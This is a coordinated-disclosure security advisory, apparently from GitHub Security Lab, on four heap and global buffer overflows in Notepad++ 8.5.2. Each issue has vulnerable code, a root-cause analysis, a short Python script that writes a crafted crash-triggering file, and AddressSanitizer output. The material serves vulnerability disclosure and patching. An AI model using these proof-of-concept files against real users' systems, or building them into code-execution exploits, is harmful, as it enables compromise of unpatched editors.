skip to content
Back to GitHub.com
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
August 21, 2023

GHSL-2023-112, GHSL-2023-102, GHSL-2023-103, GHSL-2023-092: Buffer Overflows in Notepad++ - CVE-2023-40031, CVE-2023-40036, CVE-2023-40164, CVE-2023-40166

Jaroslav Lobacevski

Coordinated Disclosure Timeline

Summary

Notepad++ reads and writes past the end of a buffer bounds on opening a crafted file.

Product

Notepad++

Tested Version

v8.5.2

Details

Issue 1: Heap buffer write overflow in Utf8_16_Read::convert (GHSL-2023-112)

The Utf8_16_Read::convert function allocates a new buffer [1] for UTF16 to UTF8 conversion. It calculates the new buffer size assuming that, in the worst case scenario, for every two UTF16 encoded input bytes it may need three UTF8 bytes [2]. However, when the input length is a malformed odd number of bytes, the calculation is off. For example, in the PoC, when a second chunk of bytes is processed, len is set to 9 and newSize becomes 14 (9 + 9 / 2 + 1). After the first 8 input bytes get consumed ([3] and [4]), the pCur is already shifted [5] by 12 elements in the 14 elements m_pNewBuf array. Utf16_Iter::operator++ consumes the last 9th byte and the 10th byte beyond the input len. However, since Notepad++ reads files in chunks the 10th byte is from a valid buffer, but contains the old chunk data. Then, in [5], it writes three bytes into pCur overflowing the array.

...
        case uni16LE: {
            size_t newSize = len + len / 2 + 1; // [2]

            if (m_nAllocatedBufSize != newSize)
            {
                if (m_pNewBuf)
                    delete[] m_pNewBuf;
                m_pNewBuf = NULL;
                m_pNewBuf = new ubyte[newSize]; // [1]
                m_nAllocatedBufSize = newSize;
            }

            ubyte* pCur = m_pNewBuf;

            m_Iter16.set(m_pBuf + nSkip, len - nSkip, m_eEncoding);

            while (m_Iter16)
            {
                ++m_Iter16; // [3]
                utf8 c;
                while (m_Iter16.get(&c)) // [4]
                    *pCur++ = c; // [5]
            }
...

Since Utf16_Iter::read() always consumes two bytes its validity operator should check if the current pointer and the next one are less than the end: operator bool() { return (m_pRead + 1 < m_pEnd) || (m_out1st != m_outLst); };

Impact

This issue may lead to an arbitrary code execution.

Resources

To reproduce the issue:

  1. Create a file with the following python script:
with open("poc", "wb") as f:
  f.write(b'\xfe\xff')
  f.write(b'\xff' * (128 * 1024 + 4 - 2 + 1))
  1. Make ASAN build of Notepad++.

  2. Open the file in Notepad++ to hit out of bounds access with ASAN.

The output when built with ASAN:

==8896==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x1281524e6472 at pc 0x7ff7308d686e bp 0x00a8c41da680 sp 0x00a8c41da680
WRITE of size 1 at 0x1281524e6472 thread T0
==8896==WARNING: Failed to use and restart external symbolizer!
    #0 0x7ff7308d686d in Utf8_16_Read::convert C:\npp\PowerEditor\src\Utf8_16.cpp:181
    #1 0x7ff730060498 in FileManager::loadFileData C:\npp\PowerEditor\src\ScintillaComponent\Buffer.cpp:1620
    #2 0x7ff73005620f in FileManager::loadFile C:\npp\PowerEditor\src\ScintillaComponent\Buffer.cpp:753
    #3 0x7ff7305729bd in Notepad_plus::doOpen C:\npp\PowerEditor\src\NppIO.cpp:422
    #4 0x7ff73051a68f in Notepad_plus::command C:\npp\PowerEditor\src\NppCommands.cpp:3931
    #5 0x7ff7304d8163 in Notepad_plus::process C:\npp\PowerEditor\src\NppBigSwitch.cpp:777
    #6 0x7ff7304eb383 in Notepad_plus_Window::runProc C:\npp\PowerEditor\src\NppBigSwitch.cpp:127
    #7 0x7ff7304eafa1 in Notepad_plus_Window::Notepad_plus_Proc C:\npp\PowerEditor\src\NppBigSwitch.cpp:84
    #8 0x7fffdb1e8230 in DispatchMessageW+0x740 (C:\WINDOWS\System32\USER32.dll+0x180018230)
    #9 0x7fffdb1e7cf0 in DispatchMessageW+0x200 (C:\WINDOWS\System32\USER32.dll+0x180017cf0)
    #10 0x7ff73091b3eb in wWinMain C:\npp\PowerEditor\src\winmain.cpp:720
    #11 0x7ff7312b0b71 in invoke_main D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:118
    #12 0x7ff7312b0a9d in __scrt_common_main_seh D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #13 0x7ff7312b095d in __scrt_common_main D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:330
    #14 0x7ff7312b0bed in wWinMainCRTStartup D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_wwinmain.cpp:16
    #15 0x7fffda4c26ac in BaseThreadInitThunk+0x1c (C:\WINDOWS\System32\KERNEL32.DLL+0x1800126ac)
    #16 0x7fffdbf2a9f7 in RtlUserThreadStart+0x27 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18005a9f7)

0x1281524e6472 is located 0 bytes to the right of 2-byte region [0x1281524e6470,0x1281524e6472)
allocated by thread T0 here:
    #0 0x7ff731263623 in operator new[] D:\a\_work\1\s\src\vctools\asan\llvm\compiler-rt\lib\asan\asan_win_new_array_thunk.cpp:42
    #1 0x7ff7308d665a in Utf8_16_Read::convert C:\npp\PowerEditor\src\Utf8_16.cpp:168
    #2 0x7ff730060498 in FileManager::loadFileData C:\npp\PowerEditor\src\ScintillaComponent\Buffer.cpp:1620
    #3 0x7ff73005620f in FileManager::loadFile C:\npp\PowerEditor\src\ScintillaComponent\Buffer.cpp:753
    #4 0x7ff7305729bd in Notepad_plus::doOpen C:\npp\PowerEditor\src\NppIO.cpp:422
    #5 0x7ff73051a68f in Notepad_plus::command C:\npp\PowerEditor\src\NppCommands.cpp:3931
    #6 0x7ff7304d8163 in Notepad_plus::process C:\npp\PowerEditor\src\NppBigSwitch.cpp:777
    #7 0x7ff7304eb383 in Notepad_plus_Window::runProc C:\npp\PowerEditor\src\NppBigSwitch.cpp:127
    #8 0x7ff7304eafa1 in Notepad_plus_Window::Notepad_plus_Proc C:\npp\PowerEditor\src\NppBigSwitch.cpp:84
    #9 0x7fffdb1e8230 in DispatchMessageW+0x740 (C:\WINDOWS\System32\USER32.dll+0x180018230)
    #10 0x7fffdb1e7cf0 in DispatchMessageW+0x200 (C:\WINDOWS\System32\USER32.dll+0x180017cf0)
    #11 0x7ff73091b3eb in wWinMain C:\npp\PowerEditor\src\winmain.cpp:720
    #12 0x7ff7312b0b71 in invoke_main D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:118
    #13 0x7ff7312b0a9d in __scrt_common_main_seh D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #14 0x7ff7312b095d in __scrt_common_main D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:330
    #15 0x7ff7312b0bed in wWinMainCRTStartup D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_wwinmain.cpp:16
    #16 0x7fffda4c26ac in BaseThreadInitThunk+0x1c (C:\WINDOWS\System32\KERNEL32.DLL+0x1800126ac)
    #17 0x7fffdbf2a9f7 in RtlUserThreadStart+0x27 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18005a9f7)

SUMMARY: AddressSanitizer: heap-buffer-overflow C:\npp\PowerEditor\src\Utf8_16.cpp:181 in Utf8_16_Read::convert
Shadow bytes around the buggy address:
  0x04cd7c51cc30: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa fd fd
  0x04cd7c51cc40: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa fd fd
  0x04cd7c51cc50: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa fd fd
  0x04cd7c51cc60: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x04cd7c51cc70: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
=>0x04cd7c51cc80: fa fa fd fd fa fa fd fd fa fa fd fd fa fa[02]fa
  0x04cd7c51cc90: fa fa fd fa fa fa fd fa fa fa 00 00 fa fa 04 fa
  0x04cd7c51cca0: fa fa 04 fa fa fa 01 fa fa fa 04 fa fa fa 01 fa
  0x04cd7c51ccb0: fa fa 01 fa fa fa 04 fa fa fa 00 fa fa fa 04 fa
  0x04cd7c51ccc0: fa fa 04 fa fa fa 04 fa fa fa 00 00 fa fa 04 fa
  0x04cd7c51ccd0: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
Address Sanitizer Error: Heap buffer overflow

CVE

Issue 2: Global buffer read overflow in CharDistributionAnalysis::HandleOneChar (GHSL-2023-102)

Notepad++ uses a diverged copy of the uchardet library. A crafted file allows reading past the bounds of a globally allocated object buffer on file open operation.

The array index order in [1] depends on the input file content and can be set to something that is greater than the size of the mCharToFreqOrder buffer, which leads to out of buffer read. For example, in the PoC it is set to 5419 while the size of mCharToFreqOrder (a pointer to the global array EUCTWCharToFreqOrder) is 5376 elements. Notice, that there is a check [2] before the line for mTableSize. However mTableSize for EUCTWCharToFreqOrder is declared as 8102 for some reason.

  //Feed a character with known length
  void HandleOneChar(const char* aStr, PRUint32 aCharLen)
  {
    PRInt32 order;

    //we only care about 2-bytes character in our distribution analysis
    order = (aCharLen == 2) ? GetOrder(aStr) : -1;

    if (order >= 0)
    {
      mTotalChars++;
      //order is valid
      if ((PRUint32)order < mTableSize) // [2]
      {
        if (512 > mCharToFreqOrder[order]) // [1] buffer read overflow
          mFreqChars++;
      }
    }
  }

This behavior has been fixed in the freedesktop.org uchardet.

Impact

The exploitability of this issue is not clear. Potentially it may be used to leak internal memory allocation information.

Resources

To reproduce the issue:

  1. Create a file with the following python script:
with open("poc", "wb") as f:
  f.write(b'\xfd\xde')
  1. Make ASAN build or set a breakpoint at if (512 > mCharToFreqOrder[order]).

  2. Open the file to hit the breakpoint or out of bounds access with ASAN.

The output when built with ASAN:

==13==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000005f4c16 at pc 0x000000589f61 bp 0x7ffde5e554c0 sp 0x7ffde5e554b8
READ of size 2 at 0x0000005f4c16 thread T0
SCARINESS: 24 (2-byte-read-global-buffer-overflow-far-from-bounds)
    #0 0x589f60 in HandleOneChar /src/notepad-plus-plus/PowerEditor/src/uchardet/CharDistribution.h:69:19
    #1 0x589f60 in nsEUCTWProber::HandleData(char const*, unsigned int) /src/notepad-plus-plus/PowerEditor/src/uchardet/nsEUCTWProber.cpp:70:31
    #2 0x57e75c in nsMBCSGroupProber::HandleData(char const*, unsigned int) /src/notepad-plus-plus/PowerEditor/src/uchardet/nsMBCSGroupProber.cpp:160:25
    #3 0x57aadf in nsUniversalDetector::HandleData(char const*, unsigned int) /src/notepad-plus-plus/PowerEditor/src/uchardet/nsUniversalDetector.cpp:214:34
    #4 0x5796a8 in uchardet_handle_data /src/notepad-plus-plus/PowerEditor/src/uchardet/uchardet.cpp:89:63

DEDUP_TOKEN: HandleOneChar--nsEUCTWProber::HandleData(char const*, unsigned int)--nsMBCSGroupProber::HandleData(char const*, unsigned int)
0x0000005f4c16 is located 86 bytes to the right of global variable 'EUCTWCharToFreqOrder' defined in '/src/notepad-plus-plus/PowerEditor/src/uchardet/EUCTWFreq.tab:62:22' (0x5f21c0) of size 10752
SUMMARY: AddressSanitizer: global-buffer-overflow /src/notepad-plus-plus/PowerEditor/src/uchardet/CharDistribution.h:69:19 in HandleOneChar
Shadow bytes around the buggy address:
  0x0000800b6930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b6940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b6950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b6960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b6970: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 f9
=>0x0000800b6980: f9 f9[f9]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0000800b6990: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0000800b69a0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0000800b69b0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0000800b69c0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0000800b69d0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==13==ABORTING

CVE

Issue 3: Global buffer read overflow in nsCodingStateMachine::NextState (GHSL-2023-103)

Notepad++ uses a diverged copy of the uchardet library. A crafted file allows reading past the bounds of a globally allocated object buffer on file open operation.

The array index byteCls in [1] depends on the input file content and can be set to something that is greater than the size of the charLenTable buffer, which leads to out of buffer read. For example, in the PoC it is set to 9, however charLenTable points to ISO2022JPCharLenTable which contains only 8 elements.

  nsSMState NextState(char c) {
    //for each byte we get its class , if it is first byte, we also get byte length
    PRUint32 byteCls = GETCLASS(c);
    if (mCurrentState == eStart)
    {
      mCurrentBytePos = 0;
      mCurrentCharLen = mModel->charLenTable[byteCls]; // [1] buffer read overflow
    }

This behavior has been fixed in the freedesktop.org uchardet.

Impact

The exploitability of this issue is not clear. Potentially it may be used to leak internal memory allocation information.

Resources

To reproduce the issue:

  1. Create a file with the following python script:
    with open("poc", "wb") as f:
      f.write(b'\x49\x7e\x7b')
    
  2. Make ASAN build or set a conditional breakpoint at mCurrentCharLen = mModel->charLenTable[byteCls]; when byteCls == 9.

  3. Open the file to hit the breakpoint or out of bounds access with ASAN.

The output when built with ASAN:

==13==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000005f0184 at pc 0x00000057c32f bp 0x7ffcd9144950 sp 0x7ffcd9144948
READ of size 4 at 0x0000005f0184 thread T0
SCARINESS: 17 (4-byte-read-global-buffer-overflow)
    #0 0x57c32e in NextState /src/notepad-plus-plus/PowerEditor/src/uchardet/nsCodingStateMachine.h:72:25
    #1 0x57c32e in nsEscCharSetProber::HandleData(char const*, unsigned int) /src/notepad-plus-plus/PowerEditor/src/uchardet/nsEscCharsetProber.cpp:84:47
    #2 0x57ac88 in nsUniversalDetector::HandleData(char const*, unsigned int) /src/notepad-plus-plus/PowerEditor/src/uchardet/nsUniversalDetector.cpp:202:29
    #3 0x5796a8 in uchardet_handle_data /src/notepad-plus-plus/PowerEditor/src/uchardet/uchardet.cpp:89:63

DEDUP_TOKEN: NextState--nsEscCharSetProber::HandleData(char const*, unsigned int)--nsUniversalDetector::HandleData(char const*, unsigned int)
0x0000005f0184 is located 60 bytes to the left of global variable 'ISO2022KRSMModel' defined in '/src/notepad-plus-plus/PowerEditor/src/uchardet/nsEscSM.cpp:254:15' (0x5f01c0) of size 72
0x0000005f0184 is located 28 bytes to the left of global variable '<string literal>' defined in '/src/notepad-plus-plus/PowerEditor/src/uchardet/nsEscSM.cpp:206:3' (0x5f01a0) of size 12
  '<string literal>' is ascii string 'ISO-2022-JP'
0x0000005f0184 is located 4 bytes to the right of global variable 'ISO2022JPCharLenTable' defined in '/src/notepad-plus-plus/PowerEditor/src/uchardet/nsEscSM.cpp:199:23' (0x5f0160) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow /src/notepad-plus-plus/PowerEditor/src/uchardet/nsCodingStateMachine.h:72:25 in NextState
Shadow bytes around the buggy address:
  0x0000800b5fe0: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
  0x0000800b5ff0: 04 f9 f9 f9 f9 f9 f9 f9 00 04 f9 f9 00 00 00 00
  0x0000800b6000: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0000800b6010: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
  0x0000800b6020: 00 00 00 00 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
=>0x0000800b6030:[f9]f9 f9 f9 00 04 f9 f9 00 00 00 00 00 00 00 00
  0x0000800b6040: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0000800b6050: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 04 f9
  0x0000800b6060: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 04 f9 f9
  0x0000800b6070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b6080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==13==ABORTING

CVE

Issue 4: Heap buffer read overflow in FileManager::detectLanguageFromTextBegining (GHSL-2023-092)

Notepad++ on file open calls FileManager::loadFile where it allocates a fixed size buffer:

char* data = new char[blockSize + 8]; // +8 for incomplete multibyte char
...
bool res = loadFileData(doc, fileSize, backupFileName ? backupFileName : fullpath, data, &UnicodeConvertor, loadedFileFormat);
delete[] data;

The FileManager::loadFileData loads the first block of data to the buffer [1] and calls detectLanguageFromTextBegining to identify the content type from the beginning of the file [2].

lenFile = fread(data + incompleteMultibyteChar, 1, blockSize - incompleteMultibyteChar, fp) + incompleteMultibyteChar; // 1
if (ferror(fp) != 0)
{
    success = false;
    break;
}
if (lenFile == 0) break;
...
fileFormat._language = detectLanguageFromTextBegining((unsigned char *)data, lenFile); // 2

The FileManager::detectLanguageFromTextBegining advances the data pointer until non-space character is detected or lenFile is reached [3]. In the latter case it continues running the code reading 32 bytes (40 - 8, the extra padding added for incomplete multibyte character case) past the end of the data buffer [4].

LangType FileManager::detectLanguageFromTextBegining(const unsigned char *data, size_t dataLen)
{
...
// Skip any space-like char
for (; i < dataLen; ++i) // 3
{
    if (data[i] != ' ' && data[i] != '\t' && data[i] != '\n' && data[i] != '\r')
        break;
}

// Create the buffer to need to test
const size_t longestLength = 40; // shebangs can be large
std::string buf2Test = std::string((const char*)data + i, longestLength); // 4   OOB READ

At the end of the loop, there should be a check that the value of i + longestLength is still less than dataLen.

Impact

The exploitability of this issue is not clear. Potentially it may be used to leak internal memory allocation information.

Resources

To reproduce the issue:

  1. Enable page heap for notepad++.exe in GFlags.

  2. Create a poc.xml with the following python script:

with open("poc.xml", "w") as f:
  f.write(" " * (128 * 1024 + 4))
  1. Open the file with notepad++ to trigger the memory read exception.

CVE

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-092, GHSL-2023-102, GHSL-2023-103 or GHSL-2023-112 in any communication regarding this issue.